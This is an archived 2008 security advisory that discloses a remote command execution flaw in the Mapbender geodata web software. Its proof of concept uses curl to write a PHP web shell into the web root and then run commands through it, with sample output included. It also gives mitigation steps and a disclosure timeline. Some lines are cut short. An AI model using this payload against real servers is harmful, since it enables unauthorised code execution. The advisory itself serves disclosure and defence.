[UNIX] Mapbender Command Execution
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 12 Mar 2008 09:46:46 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
- - - - - - - - -
Mapbender Command Execution
" <http://www.mapbender.org> Mapbender is the software and portal site for
geodata management of OGC OWS architectures. The software provides web
technology for managing spatial data services implemented in PHP,
displaying, navigating and querying OGC compliant map services. The
Mapbender framework furthermore provides authentication and authorization
services, OWS proxy functionality, management interfaces for user, group
and service administration in WebGIS projects." During a penetration test
RedTeam Pentesting discovered a remote command execution vulnerability in
Mapbender. An unauthorized user can create arbitrary PHP-files on the
Mapbender webserver, which can later be executed.
The Mapbender software comes with a script mapFiler.php, which is located
Due to the lack of input filtering, an attacker is able to enter valid PHP
code in the "factor" input field. This PHP code is written into a newly
generated file in the Mapbender webfolder. Therefore, it is possible to
remotely execute the code by requesting the new file.
Proof of Concept:
For this example, the user account which is used to execute php scripts
needs permissions to write files to the tmp directory. Any other directory
with write permissions in the web root can be used, too.
curl -d "myLocation=../tmp/.&factor=<?php passthru(base64_decode(
\$_GET[c])) ?>.php&button=let's go" http://www.example.com/
creates a file
tmp/_\<\?php\ passthru\(base64_decode\(\$_GET\[c\]\)\)\ \?\>.php.
with the content:
#Modified by MapbenderTools
#Factor: <?php passthru(base64_decode($_GET[c])) ?>.php
This script can then be executed by calling:
curl -g 'http://www.example.com/tmp/_<%3fphp%20passthru(base64_decode(
#Modified by MapbenderTools
#Factor: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Commands sent to the script have to be base64 encoded and will be decoded
by the PHP code, to avoid possible URL filtering on the victim's side.
If not needed, the mapfiler.php script can be removed. Otherwise, it can
be protected by using an .htaccess directive.
The vulnerability is fixed in release 2.4.5 rc1.
The security risk is rated as high. An attacker can execute arbitrary
commands remotely with the rights of the webserver.
2007-12-14 - Problem identified during a penetration test
2008-01-09 - Customer approves contacting of Mapbender developers
2008-01-17 - CVE number assigned
2008-03-10 - Vendor releases fixed version
2008-03-11 - Advisory released
The information has been provided by
<mailto:release@xxxxxxxxxxxxxxxxxxxxx> RedTeam Pentesting GmbH.
The original article can be found at:
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Prev by Date: [NT] Acronis PXE Server Directory Traversal and NULL Pointer
- Next by Date: [UNIX] Mapbender SQL Injections
- Previous by thread: [NT] Acronis PXE Server Directory Traversal and NULL Pointer
- Next by thread: [UNIX] Mapbender SQL Injections